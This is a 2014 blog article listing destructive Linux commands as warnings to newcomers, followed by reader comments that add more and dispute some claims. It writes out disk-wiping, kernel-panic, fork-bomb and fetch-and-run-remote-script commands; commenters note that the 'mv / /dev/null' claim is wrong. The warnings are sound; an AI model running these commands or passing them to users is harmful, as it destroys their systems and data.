9 Lethal Linux Commands You Should Never Run

Joel Lee 13-11-2014

Linux can be a double-edged sword. It assumes that you know what you’re doing and gives you the freedom to do whatever you want. It won’t question you. This is convenient when you actually know what you’re doing, but it also means that you could conceivably render your system unusable within seconds.


New to the Linux command line? No worries. Get started with our Linux terminal quickstart guide A Quick Guide To Get Started With The Linux Command Line You can do lots of amazing stuff with commands in Linux and it's really not difficult to learn. Read More along with these 40 essential Linux commands An A-Z of Linux - 40 Essential Commands You Should Know Linux is the oft-ignored third wheel to Windows and Mac. Yes, over the past decade, the open source operating system has gained a lot of traction, but it’s still a far cry from being considered... Read More . With those two resources, you’ll familiarize yourself with the command line in no time.

But whether you’re a Linux newbie or veteran, you should never run a command unless you know exactly what it does. Here are some of the deadliest Linux commands that you’ll, for the most part, want to avoid.

Delete Recursively

The Linux ability to delete anything you want without question is a godsend, especially after dealing with years of “That file can’t be deleted” errors in Windows. But Internet trolls will be quick to deceive you, presenting you with extremely dangerous removal commands that can wipe entire hard drives.

rm -rf /

This line executes the remove command rm with two toggles: -r which forces recursive deletion through all subdirectories and -f which forces deletion of read-only files without confirmation. The command is executed on the / root directory, essentially wiping your whole system clean.

Note, these days on most Linux systems if you tried doing this you’d get a warning. But the warning isn’t guaranteed, so just don’t do it.


Format Hard Drive

The terminal is especially tricky for Linux newbies because it provides several ways to accidentally wipe one’s hard drive. Recursive deletion is a big one, but here’s another:

mkfs.ext3 /dev/hda

This command formats the hard drive to use the ext3 filesystem. Disk drive formatting How To Reformat Your FAT32 Drive To NTFS - And The Advantages Of Doing It You may not know it, but choosing the right filesystem for your drives is actually pretty important. Although the main idea of all filesystems is the same, there are many advantages and disadvantages over each... Read More is not an inherently malicious action, but it does “reset” the drive such that it’s “as good as new”. In other words, a formatted hard drive is like a blank slate.

Formatting is useful for disk partitions and external drives, but executing it on an entire hard drive (such as /dev/hda) is dangerous and can leave your system in an unrecoverable state.

Overwrite Hard Drive

As if accidental disk formatting wasn’t bad enough, it’s possible to overwrite your hard drive using raw data. At least disk formatting is an actual procedure with real-life uses; directly overwriting one’s drive, on the other hand, is not so great.

command > /dev/hda

In the command above, command can be replaced by any Bash command. The > operator redirects the output from the command on its left to the file on its right. In this case, it doesn’t matter what the output of the left command is. That raw data is being redirected and used to overwrite the system hard drive.

As you can imagine, this renders it useless.

Wipe Hard Drive

Here’s another way to ruin your system. This time around, the command will completely zero out your hard drive. No data corruptions or overwrites; it will literally fill your hard drive with zeroes. A hard drive doesn’t get any more wiped than that.

dd if=/dev/zero of=/dev/hda

The dd command is a low-level instruction that’s mostly used to write data to physical drives. The if parameter determines the source of data, which in this case is /dev/zero, a special on Linux that produces an infinite stream of zeroes. The of parameter determines the destination of those zeroes, which is the /dev/hda drive.


Yes, there are legitimate reasons for zeroing a drive, but if you don’t know what those reasons are, then you’ll want to stay away from this command.

Implode Hard Drive

If you’re tired of hearing ways to wreck your hard drive, hang on. Here’s one more for you. On Linux, there’s a special file called /dev/null that will discard whatever data is written to it. You can think of it as a black hole or a file shredder: anything given to it as input will be eaten up for good.

mv / /dev/null

Can you spot the danger here? The mv command tries to move the system’s root directory / into the black hole of /dev/null. This is a valid command and the result is devastating: the hard drive gets eaten up and there’s nothing left. Doing this will make your system unusable.

Cause Kernel Panic

Windows has its infamous Blue Screen of Death Windows 8 Crashing? How to Easily Troubleshoot Blue Screen & Other Issues Windows 8 isn't perfect. That said, most blue screens and application crashes aren't Windows' fault. Our tips will help you identify exactly what's wrong with your PC and fix it. Read More . And despite the myths that float around, Linux is not a perfectly secure system 4 Cyber Security Myths That Must Die Read More . Sometimes, an internal error occurs from which recovery is impossible, so the system will enact something similar to the Blue Screen: a kernel panic.

dd if=/dev/random of=/dev/port

echo 1 > /proc/sys/kernel/panic

cat /dev/port

cat /dev/zero > /dev/mem

The intricacies of the above commands aren’t important here. What is important is that running any of those lines will result in a kernel panic, forcing you to reboot your system. It’s best to stay away from these commands unless you’re absolutely sure you know what you’re doing.

Fork Bomb

Bash is the language of the Linux terminal Is Linux Confusing? Here Are The Key Terms You Need To Know These days, Ubuntu and other modern Linux distributions usually install without a hitch (and without requiring any knowledge), but as you move forward using them, you will inevitably come across all sorts of terminology that... Read More and it’s powerful. Not only can it run commands but it can also run functions, which makes it easy to write scripts that can automate system tasks. Unfortunately, functions don’t come without their own set of risks.


This obscure command is called a fork bomb, which is a special type of kernel panic. It defines a function named : that recursively calls itself twice when executed. One of the recursive calls happens in the foreground while the other happens in the background.

In other words, whenever this function executes, it spawns two child processes. Those child processes spawn their own child processes, and this cycle keeps going in an infinite loop. The only way out of it is to reboot the system.

Execute Remote Script

Here’s an innocent command that can actually be useful in day-to-day life on a Linux system. wget retrieves the contents of a web URL, which can be used to access websites or download files. However, there’s a simple trick that turns it dangerous:

wget http://an-untrusted-url -O- | sh

The above combination downloads the contents of the given URL and immediately feeds it to the sh command, which executes the downloaded contents in the terminal. If the URL were to point to a malicious script, you’d be sealing your own fate with this command.

Disable Root Command Rights

This final command is straightforward. It utilizes the commonly used rm command to disable two of the most important commands on Linux: sudo and su. Long story short, these two allow you to run other commands with root permissions. Without them, life on Linux would be miserable.

rm -f /usr/bin/sudo;rm -f /bin/su

Which is why you shouldn’t run this command. It force deletes both commands from your system without any confirmation, leaving you in a jam. There are ways to restore what you’ve deleted The Best Ways To Recover Data On Linux No matter whether it was your fault or not, things can happen to the data stored on your devices. Hard drives, solid state drives, and removable media can all potentially "lose" files because of numerous... Read More , but it’s not always straightforward nor will it be pleasant.

Please, be careful! Don’t be afraid to play around with Linux Considering Linux? 10 Common Questions Answered Here are the most common questions that Windows users have about Linux. After going through this list of questions and answers, you should feel much more confident with trying out Linux. Read More and the command line terminal, but at the same time, do your research and never execute anything unless you’re absolutely sure what it does. If someone tells you to “try this command”, always double- and triple-check it.

Have you ever run a destructive command? What happened? Did someone trick you into it? Share your thoughts and experiences with us in the comments!

Affiliate Disclosure: By buying the products we recommend, you help keep the site alive. Read more.

Whatsapp Pinterest

Leave a Reply

Your email address will not be published. Required fields are marked *

  1. Miles P Andrews
    February 25, 2019 at 1:44 pm

    Way back in the day, on my first Sun box, I was looking for space to free up on the hard drive and decided to delete some links that didn't look necessary, until the box had a kernel panic and wouldn't reboot.
    There was a long silence at the other end of the phone when I explained to my Sun VAR what I did.
    Wipe the drive and start over. LOL

  2. geremachek
    July 20, 2018 at 3:42 pm

    while true; do echo x > .$RANDOM; done
    doesn't need root

  3. Tux
    July 6, 2018 at 5:19 pm

    I did sudo chown -hR tux:tux /
    No more root for me! I reinstalled the OS tho

  4. KingTux
    July 25, 2017 at 6:34 pm

    I ran rm -rf / for fun. I was needed to reinstalled my system. Why not just burn it. Removing sudo sounds fun.

  5. 322997am
    July 6, 2017 at 11:51 am

    remember, go ahead and try these, but do it in a virtual machine if you want to try it. its pretty fun destroying vms

  6. Vin
    February 15, 2017 at 6:52 am

    Another Lethal one (which I was a victim for):

    sudo chmod -r 644 /

    Or even better,

    sudo chmod -r 444 /

    and get locked out of any access to your system! (But, yeah, data is still there)

  7. Shad Romero
    September 14, 2016 at 5:20 am

    Hey, I went out on a limb trying the "9th lethal" linux command and 'terminal' returned rm: /usr/bin/sudo: Operation not permitted

    I'm trying to figure out how to build a localhost connection for web development access. I'm a self-taught learner, my apologies for my lack thereof proper terminology/terms.


    • Vin
      February 15, 2017 at 6:46 am

      Doing "sudo rm -rf /*" WILL recursively delete *WITHOUT* any warning! Careful man, definitely lethal.

  8. Thomas
    September 9, 2016 at 1:38 pm

    Fork BOMB command above is incorrect, it is missing 3 spaces,
    the correct version should be like this:

    :(){ :|: & };:

  9. Nigga
    May 25, 2016 at 1:16 am

    I ran rm -fr /

    It was run in the Terminal app on Ubuntu, and it crashed. I rebooted and lost all access to all user accounts, even though they were still there. I had to reinstall Ubuntu.

  10. Venkat
    February 27, 2016 at 7:50 am

    last | reboot

  11. JM
    December 7, 2015 at 11:43 pm

    Here's a couple more:

    1 - On old systems, as root, 'kill -9 1' (or was it pid zero?) would kill the 'init' process, and crash your computer, and possibly trash your file system. However, newer systems won't let anyone (even root) do that.

    2 - I once taught a Linux sysadmin class on a shared system. Since everyone was root on the shared system, we all had to be careful not to step on each other. Sure enough, halfway through the class, the system started to behave odd - someone had run mkswap on /. The unusual part is it took a while (30 mins or so) for the system to start acting odd (df reveals negative 3GB size, nothing in /etc, ...) - I'm guessing the cache was large enough to keep it running for a while. Had to launch my trusty Ubuntu LiveCD on my laptop, and do show and tell for the rest of the day - and get the system re-imaged by next morning.

    • Prathamesh
      May 10, 2019 at 12:51 pm

      Me and my friend did same to remove each others folders and files while teacher was explaining few commands, then we decided to create few more fake directories to deceive each other . Later we came to a point where nobody in a class could see their files and their folders as they were renamed. LOL..Teacher had to lock down server/terminal and conducted next class on her own laptop in separate terminal...That was fun ! :D

  12. Anonymous
    April 30, 2015 at 7:42 pm

    I may be wrong, but from what I've heard, "mv / /dev/null" won't work without a few additional options. I'm pretty sure mv won't overwrite a file with a directory by default.

  13. Tachyon
    March 21, 2015 at 11:42 pm

    No problem. Cool post BTW.

  14. Tachyon
    March 20, 2015 at 1:48 pm

    Technically it should be
    rm -Rf /

    However many modern shells, especially in Linux, accept 'r' as an equivalent to 'R'
    That said, it's better to learn it correctly as not all commands accept the 'r' alternative, or if they do it has a different meaning.
    For example, chown and chmod only accept 'R' for recursive actions.

    • Joel
      March 20, 2015 at 11:58 pm

      Thanks, I wasn't aware that it differed by shell. I'll have to remember to use capital 'R' from now on!

    • John N.
      June 4, 2017 at 7:34 pm

      The shell has nothing to do with it. The command is responsible for parsing the command line. Also, r is the traditional option. R is something new from the GNU version of rm.

      • Tachyon
        June 4, 2017 at 9:39 pm

        Oh, and the whole point is that R is what other file related commands use so you're maintaining consistency.

  15. Josh
    March 17, 2015 at 12:20 pm

    Don't forget slip-ups of package manager commands! In order to upgrade LibreOffice on RPM-based systems, you have to basically remove the LO packages of the old version, and install the packages of the new version. To determine the packages:

    rpm -qa | grep libreoff

    To remove the packages:

    rpm -a | grep libreoff | xargs rpm -e --nodeps

    If you forget that "grep libreoff" command, the RPM will start removing all of the packages in the system...

    • Joel
      March 18, 2015 at 4:16 am

      Oh yes, slip-ups of any kind can be disastrous but the package manager is a definite place to be careful. Your example is pretty scary for newbies! Thanks for sharing it.

  16. me
    November 26, 2014 at 8:01 pm

    I'm surprised that he didn't mention it either. Of course, it is the same principle as Weyrleader mentions above. It will only run until enough is destroyed that it cannot run--which sounds strange, but is essentially simple. At the point when this command runs across it's own config files or other needed files it will crash from destroying the files which tell it what to do--or part of them, rather.

  17. Aaron
    November 24, 2014 at 10:51 pm

    The fork bomb is the most ironic command here. It looks like a friendly emoji, but wrecks everything if you run it.

  18. Adam
    November 23, 2014 at 5:24 pm

    Surprise the `shred -z /dev/sda1` command hasn't been mentioned yet.

  19. Joe
    November 22, 2014 at 3:17 pm

    That's why you don't give regular users root priviledges. root is the administrator, and users should not be running as root (as with sudo -s) normally. If as a non-root user you delete your own files, well, they are your files. If you smash your own china cabinet, what can be said? Make sure you backed them up. I'm pretty sure as a Windows admin you can delete the server too.

  20. Jeff
    November 22, 2014 at 11:14 am

    chmod everything to 000.

  21. Michael Tarlton
    November 15, 2014 at 3:47 pm

    Okay, I admit, I'm not a Unix guy. But, it seems to me that you could use Unix to efficiently wipe a hard drive that you're discarding, even if that hard drive was used with a Windows computer. Help me out here, but couldn't you mount the target drive and run the dd if= /dev/zero but in the of= part of the command identify your target drive instead of /dev/hda? Seems like that would work just as well as purchasing some third-party app for wiping the drive.

    • Chris Cleeland
      November 17, 2014 at 6:08 pm

      If you want a secure wipe, putting down zeros is insufficient. If you want to do that, I'd highly recommend just grabbing a copy of sysrescuecd and boot up the live version of that. See near the bottom of

      • John N.
        June 4, 2017 at 7:28 pm

        There is no such thing as a secure wipe. Why do people keep propagating this nonsense? The only way to "securely wipe" a drive is to physically shred it.

    • Derpian
      December 27, 2014 at 8:50 am

      If you can install additional package, I'd strongly recommend using shred command - it overwrites with junk. Or, if you can't
      dd if=/dev/urandom
      urandom is slow, though it gives quite random numbers. Of course, there is also /dev/random, but it is even slower.
      This way you can overwrite with random data.

  22. Joe
    November 15, 2014 at 8:30 am

    If you want to try anything questionable like the commands in this article, all you have to do is build a simple Linux virtual machine and save a copy of it that works. Then, you can run almost anything (except for very sophisticated hacks that may be able to break out of a vm) and all you'll risk is the vm itself - which can be restored from a backup ... You do backup your main system, don't you?

  23. John
    November 14, 2014 at 9:42 pm

    Easy enough to try each one. Set up a distro in a VM, make a copy of the VM file, run one of these killers, then replace the wreckage-strewen VM file with the copy and then try the next one.

  24. PlaGeRaN
    November 14, 2014 at 12:08 pm

    for basic or starter Unix user's these commands are to advanced to use.
    If they are following a forum and "incorrectly" type some of these commands they will have a problem.
    I'm a bit of a novice in unix and never once came across these commands till now.

    Ps your forgetting su or sudo before every command.

  25. Sourabh
    November 14, 2014 at 11:46 am

    Did you mean rm -rf --no-preserve-root

  26. Josiah
    November 14, 2014 at 2:54 am

    Can we get a video of someone running al of these??????

    • Rob
      November 15, 2014 at 5:09 am

      Make one.

    • Hori
      December 25, 2014 at 3:37 pm

      Install a Linux distro on a virtual drive (using VirtualBox, or VMWare) and try for yourself :D I's safe, educational and most importantly, satisfing! (or that's just me?)

  27. Chris Cleeland
    November 13, 2014 at 3:37 pm

    "Implode Hard Drive" is a non-issue. The command tries to move a directory to a file, which is not permitted even by root. You'll get an error like the following:

    mv: cannot overwrite non-directory `/dev/null' with directory `/'

    • Dan
      November 13, 2014 at 11:09 pm

      That may not be the case with all Linux distributions or other unix-like OSes.

    • Chris Cleeland
      November 13, 2014 at 11:39 pm

      (a) the article is specifically about linux
      (b) I get similar errors on OS X
      (c) please cite a single Linux distro or other unix-like OS where the suggested "mv" does what the author suggests

      Of course, the easiest thing would be for the author to cite the distribution on which he tested each of these "issues".

    • Chris Cleeland
      November 14, 2014 at 1:49 am

      (a) this article is specifically about linux
      (b) on OS X it gives similar behavior
      (c) please cite one linux distribution where the behavior suggested by the author actually occurs; for simplicity, try creating a directory and moving that directory to /dev/null, e.g.,

      $ mkdir /tmp/foo
      $ mv /tmp/foo /dev/null

      Even easier, perhaps the author could reveal the distribution on which he tested all these dangerous commands.

    • Chris Cleeland
      November 14, 2014 at 1:53 am

      For "Disable Root Command Rights", one would still have the option of either logging in directly as root (if so enabled) or booting to single-user mode.

      For "Cause Kernel Panic" have to run any of those commands as root in order for them to have any negative effect.

      I think you could distill all of these down to one rule: Don't Be Root Unless You Know What You're Doing.

    • WG
      December 1, 2014 at 8:23 am

      The mv to /dev/null certainly works if you log into an Android phone via adb shell, and try to delete something that way!

  28. Weyrleader
    November 13, 2014 at 3:08 pm

    I'm an old Unix developer from Bell Labs days. I once needed to reinstall Unix on a computer and thought I'd try the "rm -fr /" command before wiping the disk for reinstallation. It does ruin the system, but it doesn't remove everything on the disk. In fact it only gets to a small amount of the files before crashing the system. The number of files deleted depends on the order in which their deleted. Which depends on the order in which they were installed when the OS was first laid out. So, although this command's result is essentially as deadly as described in the article. It's not nearly as destructive as you state.

  29. SIlverlokk
    November 13, 2014 at 1:43 pm

    Speaking of su and sudo, most of those commands require root privileges

  30. Carey Barnett
    November 13, 2014 at 12:38 pm

    Most of us use the 'alias' function to replace dangerous commands with slightly safer alternatives. For example:

    alias rm='/bin/rm -i'

    This replaces the 'remove' command, 'rm', with the same command, but adds in the switch '-i', for 'inquire', which will ALWAYS ask you if that's what you really want. If you want to use the big hammer, you just type the full path to the command, '/bin/rm', which will override the alias.

    Here are the two commands you need to know: 'man' and 'apropos'

    'man' stands for 'manual', and apropos is short for 'man -k'. Basically 'apropos' searches the description lines of all the manual entries for keywords.

    BTW, you can 'man man' to get the manual for the manual.

    • Anonomous Coword
      November 14, 2014 at 11:22 pm

      that alias did cause a wipe of a system
      a UE that was used to always get the "are you sure" question wanted to clean out some old kernels and did
      cd /boot
      rm *
      and after that it was nothing left since on this system that alias wasn't in place.

      another thing - don't be root to start with. If you need to do something as root then "sudo something", then if you do something stupid like
      cd /

      chmod -R 777 *
      you won't kill the system